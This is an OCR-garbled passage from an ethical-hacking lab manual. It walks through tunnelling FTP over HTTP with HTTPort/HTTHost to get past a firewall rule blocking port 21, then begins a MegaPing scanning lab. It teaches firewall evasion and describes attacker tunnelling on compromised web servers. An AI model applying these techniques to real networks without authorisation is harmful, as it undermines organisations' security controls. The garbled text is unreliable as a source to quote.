address, a n d e n te r Port num ber 80

1 7 . Y o n c a n n o t s e t d ie Usernam e and Password f ie ld s .

1 8 . 111 d i e U ser personal rem ote host a t s e c tio n , c lic k s ta rt and d ie n sto p and

d ie n e n te r d ie ta r g e te d H ost m achine IP address a n d p o r t , w h ic h s h o u ld

b e 80.

C E H Lab M anual Page 225 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

19 . H e r e a n y p a s s w o r d c o u ld b e u s e d . H e r e a s a n e x a m p le : E n t e r d ie p a s s w o r d

as ‘*m agic‫״‬
In real w o rld
r|a HTTPort3.SNFM | 3 ' ‫־‬ x
environm ent,
S y s te m Proxy | p 0 rt m a p p in g | A bout | R e g iste r |
people som e tim e s
use passw ord HTTP p roxy to b y p a s s (b la n k = direct o r firewall)

p ro te c te d pro xy H ost n a m e o r IP a d d re s s : Port:

| 1 0 .0 .0 .4 |8 0
to m ake com pany
em ployees to Proxy re q u ire s a u th e n tic a tio n
U s e rn a m e : P assw ord:
ac c e s s th e
In terne t.
Misc. o p tio n s
U se r-A g en t: B y p ass m o d e :
| IE 6 .0 | R e m o te h o s t

U se p e rs o n a l re m o te h o s t a t (b la n k * u s e public)

H ost n a m e o r IP a d d re s s : *ort: P a s sv » rd :
|1 0 .0 .0 .4
I80 |............1
? | <—T his b u tto n h e lp s S ta rt

F IG U R E 14.7: H T T P o r t P ro x v settin g s \ rin d o w

2 0 . S e le c t d ie Port M apping ta b a n d c lic k Add t o c re a te N ew M apping

*‫ב‬ HTTPort 3.SNFM 1 - 1 °

S y s te m | Proxy Port m a p p in g A bout | R e g iste r J

Static T C P /IP p o rt m a p p in g s (tu n n e ls )

Q New m a p p in g
Q Local po rt
1‫ םייים‬1
1-0
(3 R e m o te h o s t
Q H T T H o s t s u p p o rts th e — re m o te , h o s t, n a m e
r e g is tra tio n , b u t it is fre e □ R e m o te port
a n d p a s s w o rd - fre e - y o u 1_0
w ill b e is s u e d a u n iq u e ID ,
w h ic h y o u c a n c o n ta c t th e
S e le c t a m a p p in g to s e e sta tistic s : LEDs:
s u p p o rt te a m a n d a sk y o u r
q u e s tio n s .
No s ta t s - s e le c t a m a p p in g ‫□□□ם‬
n /a x n /a B /sec n /a K O Proxy

Built-in SOCKS4 se rv e r
W R un SOCKS s e rv e r (p o rt 108 0 )
A vailable in "R e m o te H ost" m o d e :
r Full SOCKS4 s u p p o rt (BIND)

? | 4— This b u tto n h e lp s

F IG U R E 14.8: H T T P o r t cre a tin g a N e w M a p p in g

2 1 . S e le c t N ew M apping Node, a n d r ig h t- c lic k N ew Mapping, a n d c lic k Edit

C E H Lab M anual Page 226 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTPort 3.SNFM T33

S y s te m | Proxy m a p p in g | A bout | R e g iste r |

Static T C P /IP p o rt m a p p in g s (tu n n e ls )

New m a o Add
□ Local p Edit
‫ש‬ 0 ■
0 R e m o te h o s t
R em o v e

Tools
re m o te , h o s t, n a m e
d em o nstrate d in (=J R e m o te po rt
th is lab are L_o
ava ila b le in S e le c t a m a p p in g to s e e sta tistic s : LEDs:
D:\CEH- No s ta ts - s e le c t a m a p p in g □ □□□
Tools\CEHv8 n /a x n /a B /sec n /a K O Proxy
M odule 03 Built-in SOCKS4 s e rv e r
Scanning W R un SOCKS s e rv e r (p o rt 1080)
N e tw o rks A vailable in " R e m o te H ost" m o d e :
r Full SOCKS4 s u p p o rt (BIND)

? | 4— T his b u tto n h e lp s

F IG U R E 14.9: H T T P o r t E d itin g to assign a m a p p in g

2 2 . R e n a m e th is t o ftp c e rtifie d hacker, a n d s e le c t Local p o rt node; th e n lig h t-

c lic k E dit a n d e n te r P o r t v a lu e t o 21

2 3 . N o w r ig h t c lic k o n R em ote h o st node to E dit a n d r e n a m e i t as

ftp .c e rtifie d h a c k e r.c o m

2 4 . N o w r ig h t c lic k o n R em ote p o rt n o d e to E dit a n d e n te r d ie p o r t v a lu e t o 21

1 HTTPort 3.SNFM - 1° r x •
r*
1 S y s te m | Proxy Port m a p p in g | A bout | R e g iste r |

r Static T C P /IP p o rt m a p p in g s (tu n n e ls )

1 =1 - •.•‫=•׳‬. /s Add
0 ‫ ־‬Local p o rt
5 -2 1 R em o v e
0 R e m o te h o s t
ftp .c e rtifie d h a c k e r.c o m
R e m o te port =
S In th is kind o f I—21
environm en t, th e V

fe d e ra te d search S e le c t a m a p p in g to s e e s ta tistic s : LEDs:

w e b p a rt of No s ta ts - inactive ‫□□□ם‬
n /a x n /a B /sec n /a K O Proxy
M ic ro s o ft Search
Server 2008 w ill dulit‫־‬in server 1

n o t w o rk out-of- W R un SOCKS s e rv e r (p o rt 1 080)

A vailable in " R e m o te H ost" m o d e :
the-box because
I” Full SOCKS4 s u p p o rt (BIND)
w e o n ly suppo rt
non-passw ord J ? | T his b u tto n h e lp s
p ro te c te d proxy.
F IG U R E 14.10: H IT P o r t S ta tic T C P / IP p o rt m a p p in g

2 5 . C lic k S ta rt o n d ie Proxy ta b o f H T T P o r t t o m i l d ie H T T P tu n n e lin g .

C E H Lab M anual Page 227 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTPort 3.SNFM ‫־‬r a :

S y s te m ^ o x y | Port m a p p in g | A bout | R e g iste r |

- HTTP proxy to b y p a s s (b la n k = dire c t o r firewall)

H ost n a m e o r IP a d d r e s s : Port:
|1 0 .0 .0 .4 [80

Proxy re q u ire s a u th e n tic a tio n

U s e rn a m e : P assw ord:

Misc. o p tio n s
U ser-A gent: B y p ass m o d e :
IE 6 .0 ‫נ ד‬ [ R e m o te h o s t

U se p e rs o n a l re m o te h o s t a t (b la n k = u s e public)

H ost n a m e o r IP a d d r e s s : Port: P assw ord:

|10.0.0.4 [So ‫*״***ן‬

( J3 H T T P is th e b a sis fo r ? | ^— T his b u tto n h e lp s

W e b s u rfin g , so i f y o u c a n
fr e e ly s u r f th e W e b fro m
F IG U R E 14.11: H T T P o r t to start tu n n e lin g
w h e re y o u axe, H T T P o r t
w ill b rin g y o u th e re s t o f
th e In te r n e t a p p lic a tio n s .
2 6 . N o w s w it c h t o d ie W indow s S erver 2008 v ir t u a l m a c h in e a n d c lic k d ie

A p p lic a tio n s log ta b .

2 7 . C h e c k d ie la s t lin e i f L is te n e r liste n in g a t 0.0.0.0:80, a n d d i e n i t is m i m i n g

p r o p e r ly .

HTTHost 1 A 5

A p p lic a tio n lo g :

M A IN : H T T H O S T 1 . 8 . 5 P ER S O N A L G IF T W A R E D E M O s t a r t i n g ^
M A IN : P r o je c t c o d e n a m e : 9 9 re d b a llo o n s
M A IN : W r it t e n b y D m it r y D v o in ik o v
M A IN : ( c ) 1 9 9 9 - 2 0 0 4 , D m it r y D v o in ik o v
M A IN : 6 4 t o t a l a v a ila b le c o n n e c t io n ( s )
M A IN : n e tv /o r k s t a r t e d
M A IN : R S A k e y s in it ia liz e d
M A IN : lo a d in g s e c u r ity f i l t e r s . . .
Q T o m a k e a d a ta tu n n e l
M A IN : lo a d e d f i l t e r " g r a n t . d l l " ( a llo w s a ll c o n n e c tio n s w ith in
th ro u g h th e p a s s w o rd
M A IN : lo a d e d f i l t e r " b l o c k . d l l " ( d e n ie s al I c o n n e c tio n s w ith ir
p ro te c te d p ro x y , s o w e c a n
M A IN : d o n e , t o t a l 2 f i l t e r ( s ) lo a d e d
m a p e x te rn a l w e b s ite to M A IN : u s in g t r a n s f e r e n c o d i n g : P r im e S c r a m b le r 6 4 / S e v e n T e
lo c a l p o rt, a n d fe d e ra te th e g r a n t . d l l: f ilt e r s c o n e c tio n s
s e a rc h re s u lt. b lo c k . d ll: f ilt e r s c o n e c tio n s
!L IS T E N E R : lis t e n in g a t C.C.0.C:sT|

z]
S ta tis tic s ( Application log O p t io n s S e c u r ity | S e n d a G ift

F IG U R E 14.12 H T T H o s t A p p lic a tio n lo g se ctio n

2 8 . N o w s w it c h t o d ie W indow s S erver 2012 h o s t m a c h in e a n d t u r n ON d ie

W indow s F irew all

2 9 . G o t o W in d o w s F ir e w a ll w it h A dvanced S e cu rity

C E H Lab M anual Page 228 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

3 0 . S e le c tO utbound rules f r o m d i e l e f t p a n e o f d ie w in d o w , a n d d ie n c lic k

N ew Rule i n d i e r i g h t p a n e o f d i e w i n d o w .
Windows Firewall v/ith Advanced Security ■ -:°‫ ־‬- ‫־‬
Fie Action View Help

WindowsFircw.511withAdv! Outbound Ruin

Q InboundRuin Name Group Profile tnatfed A O utbound Rule*
■ Outbound Rules |
©B'anchCache Content R«t1i«val (HTTP.O... BranchCache- Content Retr... Al No
ConnectionSecurityRu © BranchC ache Horted Ca<t* Cbent IHTT... BranchCache - Hosted Cech - Al No
New Rule...
‫ ^ •ן‬Monitoring V Filter by Profile
©BranchCache Hosted Cache Se»ve1(HTTP. BranchCache - Hosted C ad i. Al No
©BranchC ache Peer Dncovery (WSDOut) BranchCache - PeerOtscove... Al No V Filter by State
© C o ‫׳‬e Networking •DNS <U0P-0ut) Core Networking Al Vet ■ 7 FilterbyGroup
© Core Networking- D>1v>m-e Config... Core Networking Al Yes
View
© Core Networking ‫ ־‬Dynamic Host Config... Core Networking Al rei
©CoreNetworkng ‫ ־‬Grcup Policy (ISA5S‫~־‬ Core Networking Deane■! Ves O Refresh
© Core Networking - 5‫׳‬cup Poky (NP-Out) Core Networking Domain Yes Export List...
£ ‫ ז‬T ools ©CoreNetworkeig - Group Policy CTCP-O-. Core Networking Dcm5»1 Yes
Q Help
© Core Networking - Internet Group Mana... Core Networking Al Yes
d em o nstrate d in © Core Networking ‫ ־‬IPHT7PS (TCP-Out] Core Networking Al Yes
© Core Networking- IP v ffM C u l) Core Networking Al Ves
th is lab are © Core Networkng ‫ ־‬Mulbcost listener Do-. Core Networking Al Ves
ava ila b le in © Core Networking - Mulocast Listener Qu~ Core Networking Al Yes
© Core Network*!g -Mufceost listener Rep~ Core Networking Al Ves
D:\CEH- © Core Networking •Mutecjst Listener Rep... Core Networking Al Yec
© Core Networking - Neighbor Dncovery A... Core Networking Al Ves
Tools\CEHv8 © Core Networking *fc1(j‫־׳‬oo‫ ׳‬Ceccvery S... Core Networking Al Ves
© Core Networkrig ‫ ־‬Packet loo Big (ICMP-. Core Networking Al Ves
M odule 03
© Core Networking Par3meterProblem (1- Core Networking Al Ves
Scanning © Core Networking - ficutet Advertnement... Care Networking Al Vet
© Core Networking - P.cuur Soictaeon (1C.. Core Networking Al Yes
N e tw o rks © Core Networkng - Itird o iLOP-Outl Core Networking Al Vet
v'
"■i T r" ....... ‫ז‬-

F IG U R E 14.13: W in d o w 's F ire w a ll w ith A d v a n c e d S e c u n ty w in d o w in W in d o w s S e rv e r 2008

3 1 . 111 d i e N ew Outbound Rule W izard, s e le c t d i e Port o p t io n in d ie Rule Type

s e c tio n a n d c lic k N ext

New O utb o u n d Rule Wizard ■

p
R u le T y p e

Select the type cf firewall rule to create

Steps.

■j Rule Type What :ype d rue wodd you like to create?

w Protocol and Ports

« Action O Program
Rde Bidt controls connections for a program.
« Profle
« flame ‫ >§י‬Port |
RJe W controls connexions for a TCP or UDP W .
S Tools
O Predefined:
d em o nstrate d in
| BranrhCacne - Content Retrieval (Ueee HTTP) v 1
th is lab are RUe t a controls connections for a Windows experience
ava ila b le in Z:\ O Custom
Mapped N e tw o rk Cu3tomrJe

D rive in V irtu a l
M achines

< Beck Next > 11 Cancel

F IG U R E 14.14: W in d o w s F ire w a ll se lectin g a R u le T y p e

C E H Lab M anual Page 229 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

32. N o w s e le c t All re m o te ports in d ie P rotocol and Ports s e c tio n , a n d c lic k

N ext
New Outbound Rule Wizard

P ro to co l and Porta
Specify the protocols and ports to which ths r ie apofes

Steps

+ Ru• 'yp• Doest‫*־‬sruleaopf/toTCPorUDP?

4 PrctocolandPorts <!•> TCP
4 Acaor O UDP
4 Profile
4 Name
Does tnis nie aoply tc all remote ports or specific renote port*9

Q H T T P o r t d o e s n 't r e a lly !? m o te p o d s
c a re f o r th e p ro x y as s u c h ,
O Specific remoteports:
i t w o rk s p e r fe c tly w ith
Example 80.443.5000-5010
fire w a lls , tra n s p a re n t
a c c e le ra to rs , N A T s a n d
b a s ic a lly a n y th in g th a t le ts
H T T P p r o to c o l th ro u g h .

<Eacx Ned > Cancel

F IG U R E 14.15: W in d o w s F ire w a ll assig n in g P ro to c o ls an d P o rts

3 3 . 111 d i e A c tio n s e c t i o n , s e le c t d ie B lo ck th e c o n n e c tio n '’ o p t io n a n d c lic k

N ext
New O utbound Rule Wizard

Action
Q Youneedtoinstall htthost Specify the acton to be taken when ‫ ס‬connect!:>n notches the condticno specified in the n ie .
onaPC, whois generally
accessibleontheInternet - Steps:
typicallyyour "home" PC. This
4 HUe Type What acbon ohodd b« taken whon a connexion match08 tho opochod conoticno7
means that if yon starteda
Webserver on thehome PC, 4 Protocol and Porta
everyoneelsemust be ableto O Alowttv connection
connect toit. There aretwo 4 Action
Tho nclxJes cornoctiona that 0‫ סו‬piotectod wth IPaoc 09 wel cs t103‫׳‬c otc not.
showstoppers for htthost on 4 Profile
homePCs O AlowItic cwviediui If MIs secuie
4 Name
Ths ncbdes only conredions that have been authent1:ated by usng IPsec. Comecticns
wil be secued using the settngs in IPsec p‫־‬op5rtes and nJes r the Correction Security
RuteTode.

'• ) H o c k th e c o n n e c tio n

C E H Lab M anual Page 230 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 14.16: Windows Firewall setting an Action

P rofile s e c t i o n ,
3 4 . 111 d i e s e le c t a ll th re e o p tio n s . The r u le w ill a p p ly to :

Domain, Public. P rivate a n d d ie n c lic k N ext

New O utb o u n d Rule Wizard *
Q N A T /firew all
Profile
issues: You need
Specify the prof les for which this rule applies
to enable an
inco m in g p ort. For Skin
* Ru*Typ# When does #‫ מו‬rule apply7
H TThost it w ill
4 3rctocolancPorts
ty p ic a lly be 171 Daman
# *cbor
8 0(h ttp ) or 3rcfile
Vpfces *I en a computer is connected to Is corporate doman.

44 3(https), but 0 Private

3ppies wt en a computer is connected to a pivate oetwak bcabcn. such as a home
any po rt can be orworcpi ce
used - IF the B Public
Vp*‫״‬c3 0‫ ד‬a ccmputcr io cconcctcd to a pjblc nctwoiK kcooon
HTTP p ro xy a t
w o rk sup p orts it ‫־‬
som e proxys are
c o nfig ured to
a llo w o n ly 80 and
443.

c Eacx Next > Cancel

F IG U R E 14.17: W in d o w s F ire w a ll P ro file setting s

ZZy Tools 35. T y p e P ort 21 B locked i n d ie Nam e fie ld , a n d c lic k Finish

d em o nstrate d in New O utbound Rule Wizard
th is lab are N am e
a va ila b le in S06dfy the rams and desorption of this lie.
D:\CEH-
Tools\CEHv8
M odule 03
S canning
None
N e tw o rks
|?or. 2 ' B b d c e J

Desaiption (optional):

£ 3 T h e d e fa u lt T C P p o r t
< Back Finish Cancel
fo r F T P c o n n e c tio n is p o r t
2 1. S o m e tim e s th e lo c a l
In te r n e t S e rv ic e P r o v id e r
b lo c k s th is p o r t a n d th is
w ill re s u lt in F T P

C®W<EAfl*1MaW&al Page 231 E th ic a l H ackin g and Counterm easures Copyright C by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 14.18: W in d o w s F ire w a ll assig n in g a n am e to P o e t

3 6 . T h e n e w m le Port 21 B locked is c r e a t e d a s s h o w n i n d i e f o l l o w i n g f i g u r e .

Windows Firewall with Advanced Security 1-1“ 1 * :

Fie Action View Hdp

Windows Firewall with Adv; Actions

C nfcound Rules Na Outbound Rules
C Outbound Rules
[O^Port 21 Blocked New Rule...
Connection SecuntyRul
t Monitoring
©BranchCache Content Rctrcvtl (HTTP-0.. BranchCache •Content Retr.. Al
V Filter by Profit•
^ Branch(a 1he Hotted Cache Client (H it . Branch( at hr •Hotted ( ach :1
0 BianchCach* Hosted Cache $erv*1(HTTP... BranchCach• •HuiteJCach Al V Fliter by Stirte

^ H T T P o r t d o e s n 't re a lly ©BranchCache Peer Cn<o.er/ //SD Cut) BranchCache •Peer Discove.. Al V Filter by Group

c a re f o r th e p ro x y as su ch :
© Core Networking ‫ ־‬DNS(UDP-OutJ Core Networking Al View
© C o ir Networking- Dynamic Hod Config.. Core Networking Al
i t w o rk s p e r fe c tly w ith
© Core Networking -Dynamic Host Corvfig... Core Networking Al (Oj Refresh
fire w a lls , tra n s p a re n t © Core Networking -Group Pcfccy CLSASS-- Core Networking Domain [a» Export List...
a c c e le ra to rs , N A T s a n d @PCore Netwoit'ing - Grcup PcEcy (fJP-Out) CoreNetworking Domain Li Help
b a s ic a lly a n y th in g th a t le ts © Core Networking - Group Poicy (TCP-O-. Core Networking Domain

th e H T T P p ro to c o l
© Core Networking - internet Group Mana... Core Networking Al Port 21Blocked
© Core Ndwwiing- lPHTTPS(TCP-OutJ Cote Networking Al * Disable Rule
th ro u g h . © Core Networking - (Pw6-0ut) Core Networking Al
© Core Networking Listener Do‫ ״‬Core Networking Al 4 cut
© Core Networking Muh < yt* listener O j‫״‬. Core Networking Al Gfe Copy
© Cote Networking -Mul!< aU Iktenet Rep. Core Networking Al X D«l«t«
© Cor« Networking •Vuh cast .!s:«n«r Rep. Cor• Networking Al (£ | Propeitie*
© Core Networking rfcignfccf Discovery A... Core Networking Al
© C or.1NetmD1tmg ‫ ־‬Meaghbct Discoveiy 5 , Core Networking Al U Help

© C 016 Nstworking - Pe.ktlT v. Big K M P .. CortNttwQiking Al

© Core Networking - Parameter Protolem (I.. Core Networking Al
© Core Networking ‫ ־‬Router A<hert1sement... Core Networking Al
© Core Networking -Router SoKckation (1C... Core Networking Al

F IG U R E 14.19: W in d o w s F ire w a ll N e w ru le

3 7 . R i g h t - c l i c k d i e n e w l y c r e a t e d r u l e a n d s e le c t P roperties
* W indows Firewall w ith Advanced Security

File Action View Hdp

* ‫►י‬ ^ q !
g f Windows Firewall with Adv; I Actions
f t inbound Rules Name Group * Profie Ervsl Outbound Rules -
O Outbound Rules
ConnectionSecurityRul O.P01t21 Blocked
^BranchCache Content Retrieval (HTTP-O‫״‬. Branc hCac he ‫ ־‬Cor
Disable Rale New Rule...
X/ Monitoring Cut V Filter by Profile ►
©BranchCache Hosted Cache Ciem(HTT‫״‬. BranchCache - Hos
©BranchCache Hosted Cechc Saver(HTTP_ BranchCache ‫ ־‬Ho: Copy V Filter by State ►
©BranchCache Peet Disccvay (WSD-Ckjt) BranchCache - Pee Delete V Fliter by Group ►
© Cote Networbng - Df5 (U0P-0ut) Core Networking
S H T T P o r t th e n Properties Vi*w ►
© Core Networking D>rwm : Host Ccnfig. Lore Networking
in te rc e p ts th a t c o n n e c tio n Hdp jO! Refresh
© Core Networbng •D>neo>c Most Config... Core Networking
a n d ru n s it th ro u g h a © Cote Networbng •Group Policy (ISASS-... Core Networking Dom*n Yet ^ Export Litt...
tu n n e l th ro u g h th e p ro x y . ©Core Networking Group Policy (NP-Out) Core Networking Dom»n Ves
Q Help
© Core Networbng Group PolKy(TCP-0.- Core Networking Dom»n Yes
© Core Networbng •Internet Group kbiu.. Core Networking Al Yet Port 21 Blocked -
©Core Networbng IPHTTPS(TCP-0ut) Core Networking Al Yes ♦ Disable Rule
© Core Networbng -IPv6 (1P»‫׳‬$‫<־‬XjtJ Core Networking Al Yes
© C oie Netwoibng -Mufticsst Listener Do... Core Networking Al Yes 4 c ‫״‬t
© Core Networbng - Multicast Listener Qu... Core Networking Al Yes •41 Copy
©CoreNerwcrbng -MJbcsst Listener Rep... Core Networking Al Yes X Delete
© Cote Netwoibng - Mulbcest Listener Rep... Core Networking Al Yes
Properties
© Core Networbng - Neighbor Discovery A‫״‬. Core Networking Al Yes
© Core Networbng Neighbor Discovery S... Core Networking Al Yes
0 Help
I^ C cie Netwoibng ■Packet Too Big (ICMP... Core Networking Al Yb
© Cote Networbng •Parameter Problem (1-‫ ״‬Core Networking Al Yes
© Core Networbng Reuter Atf^trtscment.- Core Networking Al YCS
© Core Netwoibng * Rcotei Sol*‫׳‬tation (1C~ Core Networking Al Yes
r ... n -.----- 11—

the properties dialog box foi the tuner it ^le»un

F IG U R E 14.20: W in d o w s F ire w a ll n e w ru le p ro p e rtie s

P rotocols and P orts t a b . C h a n g e d i e R em ote Port

3 8 . S e le c t d i e o p tio n to
£ 7 E n a b le s y o u to b yp a ss
S p e cific P orts a n d e n t e r d i e Port num ber a s 21
y o u r H T T P p ro x y in ca se it
b lo c k s y o u fro m th e
In te r n e t
3 9 . L e a v e d i e o t h e r s e t t in g s a s d i e i r d e f a u l t s a n d c l i c k A pply d ie n c lic k OK.

C E H Lab M anual Page 232 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Port 21 Blocked Properties * ‫ד‬

jerteral_________Pngams and Services Remote Conpjiefs
Protocolt and Fore | Scope | Advancec j Local Princpab

FVwocob and po*s

Prctocdtype:

Prctocd runber

Loco port All Potto

Exampb. 80. 443.5003-5010

Remote port SpecifePats
[21
Example. 80. 443.5003-5010

hten‫־‬et Gortnd Message Protocol I Custonizo.

(CMP)«ting*:

i— ‘ W it h H T T P o r t , y o u
c a n u se v a rio u s In te r n e t
s o ftw a re fr o m b e h in d th e
p ro x y , e .g ., e - m a il, in s ta n t
m e sse n g e rs, P 2 P file
sh a rin g , IC Q , N e w s , F T P ,
IR C e tc . T h e b a s ic id e a is
th a t y o u se t u p y o u r
In te r n e t s o ftw a re

F IG U R E 14.21: F ire w a ll P o r t 21 B lo c k e d P ro p e rtie s

40. T yp eftp ftp .c e rtifie d h a c k e r.c o m i n t h e c o m m a n d p r o m p t a n d p r e s s

Enter. T h e c o n n e c t i o n i s b l o c k e d i n W indow s Server 2008 by fire w a ll

£ 3 H T T P o r t d o e s n e ith e r
fre e z e n o r h a n g . W h a t y o u
a re e x p e rie n c in g is k n o w n
as ‫ ״‬b lo c k in g o p e ra tio n s ”

F IG U R E 14.22: ftp c o n n e c tio n is b lo ck e d

4 1 . N o w o p e n d ie c o m m a n d p r o m p t 0 11 d i e W indow s S erver 2012 h o s t

m a c h in e a n d ty p e ftp 127.0.0.1 a n d p re s s E nter

7 ^ H T T P o r t m a k e s it
p o s s ib le to o p e n a c lie n t
sid e o f a T C P / IP
c o n n e c tio n a n d p ro v id e it
to a n y s o ftw a re . T h e
k e y w o rd s h e re a re : "c lie n t "
a n d "a n y s o ftw a re ".

C E H Lab M anual Page 233 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 14.23: E x e c u tin g ftp co m m a n d

L a b A n a ly s is

D o c u m e n t a ll d i e I P a d d re s s e s , o p e n p o r t s a n d r u n n in g a p p lic a tio n s , a n d p r o t o c o ls

y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility In f o r m a tio n C o lle c t e d / O b je c t iv e s A c h ie v e d

P r o x y s e r v e r U s e d : 1 0 .0 .0 .4

H T T P o rt P o rt s c a n n e d : 80

R e s u lt: f t p 1 2 7 .0 .0 .1 c o n n e c t e d t o 1 2 7 .0 .0 .1

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .

Q u e s t io n s

1. H o w d o y o u s e t u p a n H T T P o r t t o u s e a n e m a il c lie n t ( O u d o o k ,

M e s s e n g e r , e tc . ) ?

2. E x a m in e i f s o ft w a r e d o e s n o t a llo w e d it in g d ie a d d re s s t o c o n n e c t to .

In t e r n e t C o n n e c tio n R e q u ir e d

0 Y es □ N o

P la tfo r m S u p p o rte d

0 C la s s r o o m □ iL a b s

C E H Lab M anual Page 234 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

B asic N etw ork T roubleshooting

Using M egaPing
MegaPing is an ultimate toolkit thatprovides complete essential utilitiesfor
information system administrators a n d I T solutionproviders.

i con k e y L a b S c e n a r io

/ / V a lu a b le
Y o u h a v e le a r n e d in th e p r e v io u s la b t h a t H T T P t u n n e l i n g is a t e c h n i q u e w h e r e
in f o r m a t io n
c o m m u n ic a tio n s w ith in n e tw o rk p r o t o c o ls a re c a p tu re d u s in g th e H T T P
s Test your p r o t o c o l. F o r a n y c o m p a n ie s t o e x is t 0 11 t h e I n t e r n e t , t h e y r e q u i r e a w e b s e r v e r .
k n o w le d g e
These w eb s e rv e rs p ro v e to be a h ig h d a ta v a lu e ta rg e t fo r a tta c k e rs . The

a tt a c k e r u s u a lly e x p lo it s d ie W W W s e rv e r r u n n in g IIS a n d g a in s c o m m a n d l i n e
W e b e x e r c is e
access to th e s y s te m . O nce a c o n n e c tio n has been e s ta b lis h e d , th e a tta c k e r
m W o r k b o o k r e v ie w
u p lo a d s a p r e c o m p ile d v e r s io n o f th e H T T P t u n n e l s e r v e r ( lits ) . W i t h th e lits

s e r v e r s e t u p th e a tta c k e r th e n s ta rts a c lie n t 0 11 h is o r h e r s y s te m a n d d ir e c ts its

tr a ffic to th e SRC p o r t o f th e s y s te m r u n n in g th e lit s s e rv e r. T h is lits p ro c e s s

lis te n s 0 11 p o r t 8 0 o f t h e h o s t W W W and r e d ir e c ts tr a ffic . The lits p ro c e s s

c a p tu re s th e t r a f f ic in H T T P h e a d e rs a n d fo rw a rd s it to th e W W W s e rv e r p o r t

8 0 , a f t e r w h i c h t h e a t t a c k e r t r ie s t o l o g i n t o t h e s y s t e m ; o n c e a c c e s s is g a in e d h e
o r s h e s e ts u p a d d i t i o n a l t o o l s t o f u r t h e r e x p l o i t t h e n e t w o r k .

M e g a P in g s e c u r ity s c a n n e r c h e c k s y o u r n e t w o r k f o r p o t e n t ia l v u ln e r a b ilit ie s t h a t

m ig h t b e u s e d t o a tt a c k y o u r n e t w o r k , a n d s a v e s in f o r m a t io n i n s e c u r ity r e p o r t s .

111 t h i s la b you w ill le a r n to use M e g a P in g to check fo r v u ln e r a b ilit ie s and

t r o u b l e s h o o t is s u e s .

L a b O b je c t iv e s

T h is la b g iv e s a n i n s ig h t i n t o p i n g in g t o a d e s t in a t io n a d d r e s s lis t . I t te a c h e s

h o w to :

■ P in g a d e s tin a tio n a d d re s s lis t

■ T ra c e ro u te

■ P e rfo rm N e tB IO S s c a n n in g

C E H Lab M anual Page 235 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

T o c a n y o u t d ie la b , y o u n e e d :

■ D:\CEH-Tools\CEHv8 M odule 03 S canning

M e g a P in g is lo c a t e d a t
C D Tools N e tw o rk s \S c a n n in g T ools\M egaP in g
d em o nstrate d in
th is lab are ■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f M egaping fro m th e lin k

a va ila b le in h ttp : / / w w w .m a g n e to s o ft.c o m /

D:\CEH•
■ I f y o u d e c id e t o d o w n l o a d t h e la te s t ve rs io n , th e n s c re e n s h o ts s h o w n
Tools\CEHv8
i n th e la b m ig h t d if f e r
M odule 03
S canning ■ A d m in is t r a t iv e p r iv ile g e s t o r u n t o o ls
N e tw o rks
■ TCP/IP s e t t i n g s c o r r e c d y c o n f i g u r e d a n d a n a c c e s s ib l e D N S s e rv e r

■ T h is la b w i l l w o r k i n th e C E H la b e n v ir o n m e n t , o n W in d o w s S e rve r
P IN G sta n d s fo r
2012, W in d o w s 2008, and W in d o w s 7
P a c k e t In te r n e t G ro p e r.

L a b D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w o f P in g

T h e p in g c o m m a n d s e n d s In te rn e t C ontrol M essage P rotocol (ICMP) e c h o re q u e s t

p a c k e ts t o d ie ta r g e t h o s t a n d w a its fo r an ICMP response. D u r in g d iis re q u e s t-

re s p o n s e p ro c e s s , p in g m e a s u re s d ie tim e f r o m tr a n s m is s io n t o r e c e p tio n , k n o w n as

d ie round-trip tim e , a n d r e c o r d s a n y lo s s p a c k e ts .

L a b T a s k s

TASK 1 1. L a u n c h th e S ta rt m e n u b y h o v e r in g d ie m o u s e c u r s o r o n th e lo w e r - le ft

c o r n e r o f th e d e s k to p .
IP Scanning

F IG U R E 13.1: W in d o w s S e rv e r 2012 - D e s k to p v ie w

2. C lic k d ie M egaPing a p p t o o p e n d ie MegaPing w in d o w .

C E H Lab M anual Page 236 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 15.2: W in d o w s S e rv e r 2012 - A p p s

3. TQ i^M e g aP ing ma!1^ n n d o w ^ ^ h o ^ M 1^ h ^ b l l o \ n n ^ 1‫־‬g u1^ ^ ^

55 MegaPing (Unregistered) - □ ' x ‫ד‬
File View Tools Hdp

